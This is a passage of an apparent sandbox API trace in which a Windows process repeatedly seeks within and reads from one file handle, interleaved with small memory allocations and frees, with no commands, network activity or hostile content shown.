lpNumberOfBytesRead=0x208cd00, lpOverlapped=0x0 | out: lpBuffer=0x208cd80*, lpNumberOfBytesRead=0x208cd00*=0x1e, lpOverlapped=0x0) returned 1 [0113.174] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x169db, lpNewFilePointer=0x208cd90, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cd90*=92635) returned 1 [0113.174] ReadFile (in: hFile=0x2d0, lpBuffer=0x208cea0, nNumberOfBytesToRead=0x454, lpNumberOfBytesRead=0x208cd60, lpOverlapped=0x0 | out: lpBuffer=0x208cea0*, lpNumberOfBytesRead=0x208cd60*=0x454, lpOverlapped=0x0) returned 1 [0113.175] malloc (_Size=0x48) returned 0x12ef2cf0 [0113.175] malloc (_Size=0x32) returned 0x12ef4490 [0113.175] free (_Block=0x12ef4410) [0113.178] free (_Block=0x12ef2d40) [0113.179] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x16e3f, lpNewFilePointer=0x208cd30, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cd30*=93759) returned 1 [0113.179] ReadFile (in: hFile=0x2d0, lpBuffer=0x208cd80, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208cd00, lpOverlapped=0x0 | out: lpBuffer=0x208cd80*, lpNumberOfBytesRead=0x208cd00*=0x1e, lpOverlapped=0x0) returned 1 [0113.179] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x16e8e, lpNewFilePointer=0x208cd90, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cd90*=93838) returned 1 [0113.179] ReadFile (in: hFile=0x2d0, lpBuffer=0x208cea0, nNumberOfBytesToRead=0x11c, lpNumberOfBytesRead=0x208cd60, lpOverlapped=0x0 | out: lpBuffer=0x208cea0*, lpNumberOfBytesRead=0x208cd60*=0x11c, lpOverlapped=0x0) returned 1 [0113.182] malloc (_Size=0x48) returned 0x12ef2d40 [0113.182] malloc (_Size=0x41) returned 0x12ef2fc0 [0113.182] free (_Block=0x12ef4490) [0113.183] free (_Block=0x12ef2cf0) [0113.185] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x16fba, lpNewFilePointer=0x208cd30, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cd30*=94138) returned 1 [0113.185] ReadFile (in: hFile=0x2d0, lpBuffer=0x208cd80, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208cd00, lpOverlapped=0x0 | out: lpBuffer=0x208cd80*, lpNumberOfBytesRead=0x208cd00*=0x1e, lpOverlapped=0x0) returned 1 [0113.185] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x17018, lpNewFilePointer=0x208cd90, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cd90*=94232) returned 1 [0113.185] ReadFile (in: hFile=0x2d0, lpBuffer=0x208cea0, nNumberOfBytesToRead=0x116, lpNumberOfBytesRead=0x208cd60, lpOverlapped=0x0 | out: lpBuffer=0x208cea0*, lpNumberOfBytesRead=0x208cd60*=0x116, lpOverlapped=0x0) returned 1 [0113.187] malloc (_Size=0x48) returned 0x12ef2cf0 [0113.187] malloc (_Size=0x36) returned 0x12ef43d0 [0113.187] free (_Block=0x12ef2fc0) [0113.187] free (_Block=0x12ef2d40) [0113.189] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x1713e, lpNewFilePointer=0x208cd30, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cd30*=94526) returned 1 [0113.189] ReadFile (in: hFile=0x2d0, lpBuffer=0x208cd80, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208cd00, lpOverlapped=0x0 | out: lpBuffer=0x208cd80*, lpNumberOfBytesRead=0x208cd00*=0x1e, lpOverlapped=0x0) returned 1 [0113.189] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x17191, lpNewFilePointer=0x208cd90, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cd90*=94609) returned 1 [0113.189] ReadFile (in: hFile=0x2d0, lpBuffer=0x208cea0, nNumberOfBytesToRead=0x2c9, lpNumberOfBytesRead=0x208cd60, lpOverlapped=0x0 | out: lpBuffer=0x208cea0*, lpNumberOfBytesRead=0x208cd60*=0x2c9, lpOverlapped=0x0) returned 1 [0113.190] malloc (_Size=0x48) returned 0x12ef2d40 [0113.190] malloc (_Size=0x3d) returned 0x12ef2fc0 [0113.191] free (_Block=0x12ef43d0) [0113.191] free (_Block=0x12ef2cf0) [0113.192] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x1746a, lpNewFilePointer=0x208cd30, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cd30*=95338) returned 1 [0113.192] ReadFile (in: hFile=0x2d0, lpBuffer=0x208cd80, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208cd00, lpOverlapped=0x0 | out: lpBuffer=0x208cd80*, lpNumberOfBytesRead=0x208cd00*=0x1e, lpOverlapped=0x0) returned 1 [0113.192] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x174c4, lpNewFilePointer=0x208cd90, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cd90*=95428) returned 1 [0113.193] ReadFile (in: hFile=0x2d0, lpBuffer=0x208cea0, nNumberOfBytesToRead=0x147, lpNumberOfBytesRead=0x208cd60, lpOverlapped=0x0 | out: lpBuffer=0x208cea0*, lpNumberOfBytesRead=0x208cd60*=0x147, lpOverlapped=0x0) returned 1 [0113.194] malloc (_Size=0x48) returned 0x12ef2cf0 [0113.194] malloc (_Size=0x29) returned 0x12ef4450 [0113.194] free (_Block=0x12ef2fc0) [0113.194] free (_Block=0x12ef2d40) [0113.196] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x1761b, lpNewFilePointer=0x208cd30, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cd30*=95771) returned 1 [0113.196] ReadFile (in: hFile=0x2d0, lpBuffer=0x208cd80, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208cd00, lpOverlapped=0x0 | out: lpBuffer=0x208cd80*, lpNumberOfBytesRead=0x208cd00*=0x1e, lpOverlapped=0x0) returned 1 [0113.198] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x17661, lpNewFilePointer=0x208cd90, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cd90*=95841) returned 1 [0113.198] ReadFile (in: hFile=0x2d0, lpBuffer=0x208cea0, nNumberOfBytesToRead=0x4e1, lpNumberOfBytesRead=0x208cd60, lpOverlapped=0x0 | out: lpBuffer=0x208cea0*, lpNumberOfBytesRead=0x208cd60*=0x4e1, lpOverlapped=0x0) returned 1 [0113.199] malloc (_Size=0x48) returned 0x12ef2fc0 [0113.199] malloc (_Size=0x3d) returned 0x12ef2d40 [0113.200] free (_Block=0x12ef4450) [0113.200] free (_Block=0x12ef2cf0) [0113.201] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x17b52, lpNewFilePointer=0x208cd30, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cd30*=97106) returned 1 [0113.201] ReadFile (in: hFile=0x2d0, lpBuffer=0x208cd80, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208cd00, lpOverlapped=0x0 | out: lpBuffer=0x208cd80*, lpNumberOfBytesRead=0x208cd00*=0x1e, lpOverlapped=0x0) returned 1 [0113.202] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x17bac, lpNewFilePointer=0x208cd90, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cd90*=97196) returned 1 [0113.202] ReadFile (in: hFile=0x2d0, lpBuffer=0x208cea0, nNumberOfBytesToRead=0x129, lpNumberOfBytesRead=0x208cd60, lpOverlapped=0x0 | out: lpBuffer=0x208cea0*, lpNumberOfBytesRead=0x208cd60*=0x129, lpOverlapped=0x0) returned 1 [0113.203] malloc (_Size=0x48) returned 0x12ef2cf0 [0113.203] malloc (_Size=0x43) returned 0x12ed3840 [0113.203] free (_Block=0x12ef2d40) [0113.204] free (_Block=0x12ef2fc0) [0113.205] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x17ce5, lpNewFilePointer=0x208cd30, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cd30*=97509) returned 1 [0113.205] ReadFile (in: hFile=0x2d0, lpBuffer=0x208cd80, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208cd00, lpOverlapped=0x0 | out: lpBuffer=0x208cd80*, lpNumberOfBytesRead=0x208cd00*=0x1e, lpOverlapped=0x0) returned 1 [0113.205] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x17d45, lpNewFilePointer=0x208cd90, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cd90*=97605) returned 1 [0113.205] ReadFile (in: hFile=0x2d0, lpBuffer=0x208cea0, nNumberOfBytesToRead=0x135, lpNumberOfBytesRead=0x208cd60, lpOverlapped=0x0 | out: lpBuffer=0x208cea0*, lpNumberOfBytesRead=0x208cd60*=0x135, lpOverlapped=0x0) returned 1 [0113.206] malloc (_Size=0x48) returned 0x12ed3fc0 [0113.206] malloc (_Size=0x41) returned 0x12ef2d40 [0113.207] free (_Block=0x12ed3840) [0113.207] free (_Block=0x12ef2cf0) [0113.208] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x17e8a, lpNewFilePointer=0x208cd30, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cd30*=97930) returned 1 [0113.208] ReadFile (in: hFile=0x2d0, lpBuffer=0x208cd80, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208cd00, lpOverlapped=0x0 | out: lpBuffer=0x208cd80*, lpNumberOfBytesRead=0x208cd00*=0x1e, lpOverlapped=0x0) returned 1 [0113.209] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x17ee8, lpNewFilePointer=0x208cd90, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cd90*=98024) returned 1 [0113.209] ReadFile (in: hFile=0x2d0, lpBuffer=0x208cea0, nNumberOfBytesToRead=0x10f, lpNumberOfBytesRead=0x208cd60, lpOverlapped=0x0 | out: lpBuffer=0x208cea0*, lpNumberOfBytesRead=0x208cd60*=0x10f, lpOverlapped=0x0) returned 1 [0113.216] malloc (_Size=0x48) returned 0x12ef2cf0 [0113.216] malloc (_Size=0x33) returned 0x12ef4490 [0113.217] free (_Block=0x12ef2d40) [0113.217] free (_Block=0x12ed3fc0) [0113.218] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x18007, lpNewFilePointer=0x208cd30, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cd30*=98311) returned 1 [0113.219] ReadFile (in: hFile=0x2d0, lpBuffer=0x208cd80, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208cd00, lpOverlapped=0x0 | out: lpBuffer=0x208cd80*, lpNumberOfBytesRead=0x208cd00*=0x1e, lpOverlapped=0x0) returned 1 [0113.219] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x18057, lpNewFilePointer=0x208cd90, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cd90*=98391) returned 1 [0113.219] ReadFile (in: hFile=0x2d0, lpBuffer=0x208cea0, nNumberOfBytesToRead=0xe0, lpNumberOfBytesRead=0x208cd60, lpOverlapped=0x0 | out: lpBuffer=0x208cea0*, lpNumberOfBytesRead=0x208cd60*=0xe0, lpOverlapped=0x0) returned 1 [0113.220] malloc (_Size=0x48) returned 0x12ef2d40 [0113.220] malloc (_Size=0x48) returned 0x12ef2fc0 [0113.221] free (_Block=0x12ef4490) [0113.221] free (_Block=0x12ef2cf0) [0113.222] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x18147, lpNewFilePointer=0x208cd30, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cd30*=98631) returned 1 [0113.222] ReadFile (in: hFile=0x2d0, lpBuffer=0x208cd80, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208cd00, lpOverlapped=0x0 | out: lpBuffer=0x208cd80*, lpNumberOfBytesRead=0x208cd00*=0x1e, lpOverlapped=0x0) returned 1 [0113.222] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x181ac, lpNewFilePointer=0x208cd90, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cd90*=98732) returned 1 [0113.223] ReadFile (in: hFile=0x2d0, lpBuffer=0x208cea0, nNumberOfBytesToRead=0x597, lpNumberOfBytesRead=0x208cd60, lpOverlapped=0x0 | out: lpBuffer=0x208cea0*, lpNumberOfBytesRead=0x208cd60*=0x597, lpOverlapped=0x0) returned 1 [0113.224] malloc (_Size=0x48) returned 0x12ef2cf0 [0113.225] malloc (_Size=0x28) returned 0x12ef0720 [0113.225] free (_Block=0x12ef2fc0) [0113.226] free (_Block=0x12ef2d40) [0113.227] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x18753, lpNewFilePointer=0x208cd30, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cd30*=100179) returned 1 [0113.227] ReadFile (in: hFile=0x2d0, lpBuffer=0x208cd80, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208cd00, lpOverlapped=0x0 | out: lpBuffer=0x208cd80*, lpNumberOfBytesRead=0x208cd00*=0x1e, lpOverlapped=0x0) returned 1 [0113.227] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x18798, lpNewFilePointer=0x208cd90, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cd90*=100248) returned 1 [0113.228] ReadFile (in: hFile=0x2d0, lpBuffer=0x208cea0, nNumberOfBytesToRead=0x5f4, lpNumberOfBytesRead=0x208cd60, lpOverlapped=0x0 | out: lpBuffer=0x208cea0*, lpNumberOfBytesRead=0x208cd60*=0x5f4, lpOverlapped=0x0) returned 1 [0113.229] malloc (_Size=0x48) returned 0x12ef2d40 [0113.229] malloc (_Size=0x25) returned 0x12ef0750 [0113.230] free (_Block=0x12ef0720) [0113.230] free (_Block=0x12ef2cf0) [0113.231] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x18d9c, lpNewFilePointer=0x208cd30, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cd30*=101788) returned 1 [0113.232] ReadFile (in: hFile=0x2d0, lpBuffer=0x208cd80, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208cd00, lpOverlapped=0x0 | out: lpBuffer=0x208cd80*, lpNumberOfBytesRead=0x208cd00*=0x1e, lpOverlapped=0x0) returned 1 [0113.232] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x18dde, lpNewFilePointer=0x208cd90, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cd90*=101854) returned 1 [0113.232] ReadFile (in: hFile=0x2d0, lpBuffer=0x208cea0, nNumberOfBytesToRead=0x5c9, lpNumberOfBytesRead=0x208cd60, lpOverlapped=0x0 | out: lpBuffer=0x208cea0*, lpNumberOfBytesRead=0x208cd60*=0x5c9, lpOverlapped=0x0) returned 1 [0113.233] malloc (_Size=0x48) returned 0x12ef2cf0 [0113.233] malloc (_Size=0x34) returned 0x12ef43d0 [0113.233] free (_Block=0x12ef0750) [0113.234] free (_Block=0x12ef2d40) [0113.235] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x193b7, lpNewFilePointer=0x208cd30, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cd30*=103351) returned 1 [0113.235] ReadFile (in: hFile=0x2d0, lpBuffer=0x208cd80, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208cd00, lpOverlapped=0x0 | out: lpBuffer=0x208cd80*, lpNumberOfBytesRead=0x208cd00*=0x1e, lpOverlapped=0x0) returned 1 [0113.235] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x19408, lpNewFilePointer=0x208cd90, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cd90*=103432) returned 1 [0113.235] ReadFile (in: hFile=0x2d0, lpBuffer=0x208cea0, nNumberOfBytesToRead=0xf4, lpNumberOfBytesRead=0x208cd60, lpOverlapped=0x0 | out: lpBuffer=0x208cea0*, lpNumberOfBytesRead=0x208cd60*=0xf4, lpOverlapped=0x0) returned 1 [0113.236] malloc (_Size=0x48) returned 0x12ef2d40 [0113.236] malloc (_Size=0x2a) returned 0x12ef4410 [0113.237] free (_Block=0x12ef43d0) [0113.237] free (_Block=0x12ef2cf0) [0113.239] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x1950c, lpNewFilePointer=0x208cd30, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cd30*=103692) returned 1 [0113.239] ReadFile (in: hFile=0x2d0, lpBuffer=0x208cd80, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208cd00, lpOverlapped=0x0 | out: lpBuffer=0x208cd80*, lpNumberOfBytesRead=0x208cd00*=0x1e, lpOverlapped=0x0) returned 1 [0113.239] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x19553, lpNewFilePointer=0x208cd90, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cd90*=103763) returned 1 [0113.239] ReadFile (in: hFile=0x2d0, lpBuffer=0x208cea0, nNumberOfBytesToRead=0xc2b, lpNumberOfBytesRead=0x208cd60, lpOverlapped=0x0 | out: lpBuffer=0x208cea0*, lpNumberOfBytesRead=0x208cd60*=0xc2b, lpOverlapped=0x0) returned 1 [0113.240] malloc (_Size=0x48) returned 0x12ef2cf0 [0113.240] malloc (_Size=0x2e) returned 0x12ef43d0 [0113.241] free (_Block=0x12ef4410) [0113.241] free (_Block=0x12ef2d40) [0113.248] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x1a18e, lpNewFilePointer=0x208cd30, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cd30*=106894) returned 1 [0113.248] ReadFile (in: hFile=0x2d0, lpBuffer=0x208cd80, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208cd00, lpOverlapped=0x0 | out: lpBuffer=0x208cd80*, lpNumberOfBytesRead=0x208cd00*=0x1e, lpOverlapped=0x0) returned 1 [0113.248] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x1a1d9, lpNewFilePointer=0x208cd90, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cd90*=106969) returned 1 [0113.248] ReadFile (in: hFile=0x2d0, lpBuffer=0x208cea0, nNumberOfBytesToRead=0xac, lpNumberOfBytesRead=0x208cd60, lpOverlapped=0x0 | out: lpBuffer=0x208cea0*, lpNumberOfBytesRead=0x208cd60*=0xac, lpOverlapped=0x0) returned 1 [0113.249] malloc (_Size=0x48) returned 0x12ef2d40 [0113.249] malloc (_Size=0x3d) returned 0x12ef2fc0 [0113.250] free (_Block=0x12ef43d0) [0113.251] free (_Block=0x12ef2cf0) [0113.253] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x1a295, lpNewFilePointer=0x208cd30, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cd30*=107157) returned 1 [0113.253] ReadFile (in: hFile=0x2d0, lpBuffer=0x208cd80, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208cd00, lpOverlapped=0x0 | out: lpBuffer=0x208cd80*, lpNumberOfBytesRead=0x208cd00*=0x1e, lpOverlapped=0x0) returned 1 [0113.253] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x1a2ef, lpNewFilePointer=0x208cd90, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cd90*=107247) returned 1 [0113.253] ReadFile (in: hFile=0x2d0, lpBuffer=0x208cea0, nNumberOfBytesToRead=0x126, lpNumberOfBytesRead=0x208cd60, lpOverlapped=0x0 | out: lpBuffer=0x208cea0*, lpNumberOfBytesRead=0x208cd60*=0x126, lpOverlapped=0x0) returned 1 [0113.254] malloc (_Size=0x48) returned 0x12ef2cf0 [0113.254] malloc (_Size=0x4a) returned 0x12ee9140 [0113.254] free (_Block=0x12ef2fc0) [0113.255] free (_Block=0x12ef2d40) [0113.256] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x1a425, lpNewFilePointer=0x208cd30, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cd30*=107557) returned 1 [0113.256] ReadFile (in: hFile=0x2d0, lpBuffer=0x208cd80, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208cd00, lpOverlapped=0x0 | out: lpBuffer=0x208cd80*, lpNumberOfBytesRead=0x208cd00*=0x1e, lpOverlapped=0x0) returned 1 [0113.256] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x1a48c, lpNewFilePointer=0x208cd90, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cd90*=107660) returned 1 [0113.256] ReadFile (in: hFile=0x2d0, lpBuffer=0x208cea0, nNumberOfBytesToRead=0x24a, lpNumberOfBytesRead=0x208cd60, lpOverlapped=0x0 | out: lpBuffer=0x208cea0*, lpNumberOfBytesRead=0x208cd60*=0x24a, lpOverlapped=0x0) returned 1 [0113.257] malloc (_Size=0x48) returned 0x12ef2d40 [0113.257] malloc (_Size=0x34) returned 0x12ef43d0 [0113.258] free (_Block=0x12ee9140) [0113.258] free (_Block=0x12ef2cf0) [0113.262] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x1a6e6, lpNewFilePointer=0x208cd30, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cd30*=108262) returned 1 [0113.262] ReadFile (in: hFile=0x2d0, lpBuffer=0x208cd80, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208cd00, lpOverlapped=0x0 | out: lpBuffer=0x208cd80*, lpNumberOfBytesRead=0x208cd00*=0x1e, lpOverlapped=0x0) returned 1 [0113.262] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x1a737, lpNewFilePointer=0x208cd90, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cd90*=108343) returned 1 [0113.262] ReadFile (in: hFile=0x2d0, lpBuffer=0x208cea0, nNumberOfBytesToRead=0x174, lpNumberOfBytesRead=0x208cd60, lpOverlapped=0x0 | out: lpBuffer=0x208cea0*, lpNumberOfBytesRead=0x208cd60*=0x174, lpOverlapped=0x0) returned 1 [0113.263] malloc (_Size=0x48) returned 0x12ef2cf0 [0113.263] malloc (_Size=0x2b) returned 0x12ef4410 [0113.264] free (_Block=0x12ef43d0) [0113.264] free (_Block=0x12ef2d40) [0113.266] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x1a8bb, lpNewFilePointer=0x208cd30, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cd30*=108731) returned 1 [0113.266] ReadFile (in: hFile=0x2d0, lpBuffer=0x208cd80, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208cd00, lpOverlapped=0x0 | out: lpBuffer=0x208cd80*, lpNumberOfBytesRead=0x208cd00*=0x1e, lpOverlapped=0x0) returned 1 [0113.266] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x1a903, lpNewFilePointer=0x208cd90, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cd90*=108803) returned 1 [0113.266] ReadFile (in: hFile=0x2d0, lpBuffer=0x208cea0, nNumberOfBytesToRead=0x9d, lpNumberOfBytesRead=0x208cd60, lpOverlapped=0x0 | out: lpBuffer=0x208cea0*, lpNumberOfBytesRead=0x208cd60*=0x9d, lpOverlapped=0x0) returned 1 [0113.267] malloc (_Size=0x48) returned 0x12ef2d40 [0113.268] malloc (_Size=0x2c) returned 0x12ef43d0 [0113.268] free (_Block=0x12ef4410) [0113.268] free (_Block=0x12ef2cf0) [0113.271] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x1a9b0, lpNewFilePointer=0x208cd30, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cd30*=108976) returned 1 [0113.271] ReadFile (in: hFile=0x2d0, lpBuffer=0x208cd80, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208cd00, lpOverlapped=0x0 | out: lpBuffer=0x208cd80*, lpNumberOfBytesRead=0x208cd00*=0x1e, lpOverlapped=0x0) returned 1 [0113.271] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x1a9f9, lpNewFilePointer=0x208cd90, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cd90*=109049) returned 1 [0113.271] ReadFile (in: hFile=0x2d0, lpBuffer=0x208cea0, nNumberOfBytesToRead=0x51a, lpNumberOfBytesRead=0x208cd60, lpOverlapped=0x0 | out: lpBuffer=0x208cea0*, lpNumberOfBytesRead=0x208cd60*=0x51a, lpOverlapped=0x0) returned 1 [0113.279] malloc (_Size=0x48) returned 0x12ef2cf0 [0113.279] malloc (_Size=0x26) returned 0x12ef15c0 [0113.280] free (_Block=0x12ef43d0) [0113.280] free (_Block=0x12ef2d40) [0113.285] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x1af23, lpNewFilePointer=0x208cd30, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cd30*=110371) returned 1 [0113.285] ReadFile (in: hFile=0x2d0, lpBuffer=0x208cd80, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208cd00, lpOverlapped=0x0 | out: lpBuffer=0x208cd80*, lpNumberOfBytesRead=0x208cd00*=0x1e, lpOverlapped=0x0) returned 1 [0113.285] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x1af66, lpNewFilePointer=0x208cd90, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cd90*=110438) returned 1 [0113.285] ReadFile (in: hFile=0x2d0, lpBuffer=0x208cea0, nNumberOfBytesToRead=0xcf, lpNumberOfBytesRead=0x208cd60, lpOverlapped=0x0 | out: lpBuffer=0x208cea0*, lpNumberOfBytesRead=0x208cd60*=0xcf, lpOverlapped=0x0) returned 1 [0113.287] malloc (_Size=0x48) returned 0x12ef2d40 [0113.287] malloc (_Size=0x48) returned 0x12ef2fc0 [0113.288] free (_Block=0x12ef15c0) [0113.288] free (_Block=0x12ef2cf0) [0113.292] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x1b045, lpNewFilePointer=0x208cd30, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cd30*=110661) returned 1 [0113.292] ReadFile (in: hFile=0x2d0, lpBuffer=0x208cd80, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208cd00, lpOverlapped=0x0 | out: lpBuffer=0x208cd80*, lpNumberOfBytesRead=0x208cd00*=0x1e, lpOverlapped=0x0) returned 1 [0113.292] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x1b0aa, lpNewFilePointer=0x208cd90, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cd90*=110762) returned 1 [0113.292] ReadFile (in: hFile=0x2d0, lpBuffer=0x208cea0, nNumberOfBytesToRead=0x118, lpNumberOfBytesRead=0x208cd60, lpOverlapped=0x0 | out: lpBuffer=0x208cea0*, lpNumberOfBytesRead=0x208cd60*=0x118, lpOverlapped=0x0) returned 1 [0113.294] malloc (_Size=0x48) returned 0x12ef2cf0 [0113.294] malloc (_Size=0x41) returned 0x12ed3fc0 [0113.294] free (_Block=0x12ef2fc0) [0113.295] free (_Block=0x12ef2d40) [0113.297] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x1b1d2, lpNewFilePointer=0x208cd30, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cd30*=111058) returned 1 [0113.297] ReadFile (in: hFile=0x2d0, lpBuffer=0x208cd80, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208cd00, lpOverlapped=0x0 | out: lpBuffer=0x208cd80*, lpNumberOfBytesRead=0x208cd00*=0x1e, lpOverlapped=0x0) returned 1 [0113.297] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x1b230, lpNewFilePointer=0x208cd90, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cd90*=111152) returned 1 [0113.297] ReadFile (in: hFile=0x2d0, lpBuffer=0x208cea0, nNumberOfBytesToRead=0x116, lpNumberOfBytesRead=0x208cd60, lpOverlapped=0x0 | out: lpBuffer=0x208cea0*, lpNumberOfBytesRead=0x208cd60*=0x116, lpOverlapped=0x0) returned 1 [0113.298] malloc (_Size=0x48) returned 0x12ed3840 [0113.298] malloc (_Size=0x32) returned 0x12ef43d0 [0113.299] free (_Block=0x12ed3fc0) [0113.299] free (_Block=0x12ef2cf0) [0113.301] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x1b356, lpNewFilePointer=0x208cd30, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cd30*=111446) returned 1 [0113.301] ReadFile (in: hFile=0x2d0, lpBuffer=0x208cd80, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208cd00, lpOverlapped=0x0 | out: lpBuffer=0x208cd80*, lpNumberOfBytesRead=0x208cd00*=0x1e, lpOverlapped=0x0) returned 1 [0113.301] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x1b3a5, lpNewFilePointer=0x208cd90, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cd90*=111525) returned 1 [0113.301] ReadFile (in: hFile=0x2d0, lpBuffer=0x208cea0, nNumberOfBytesToRead=0x168, lpNumberOfBytesRead=0x208cd60, lpOverlapped=0x0 | out: lpBuffer=0x208cea0*, lpNumberOfBytesRead=0x208cd60*=0x168, lpOverlapped=0x0) returned 1 [0113.302] malloc (_Size=0x48) returned 0x12ed3fc0 [0113.302] malloc (_Size=0x3d) returned 0x12ef2cf0 [0113.303] free (_Block=0x12ef43d0) [0113.303] free (_Block=0x12ed3840) [0113.305] SetFilePointerEx (in: 